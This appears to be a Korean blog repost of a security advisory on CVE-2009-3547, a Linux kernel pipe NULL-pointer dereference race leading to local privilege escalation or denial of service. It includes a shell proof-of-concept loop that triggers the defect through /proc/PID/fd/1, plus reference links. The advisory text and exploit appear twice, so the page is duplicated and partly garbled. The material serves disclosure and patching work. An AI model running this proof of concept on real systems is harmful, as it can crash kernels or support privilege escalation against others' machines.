Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
Exploit:
The following proof of concept is available:
while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done
References:
원문 : http://www.securityfocus.com
패치코드
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
Exploit:
The following proof of concept is available:
while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done
References:
- (CVE-2009-3547) CVE-2009-3547 kernel: fs: pipe.c null pointer dereference (Eugene Teo)
- fs/pipe.c null pointer dereference (Earl Chew)
- Linux kernel Homepage (kernel.org)
- Re: [PATCH v4 1/1]: fs: pipe.c null pointer dereference + really sign off (Américo Wang )
원문 : http://www.securityfocus.com
패치코드
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/
728x90
댓글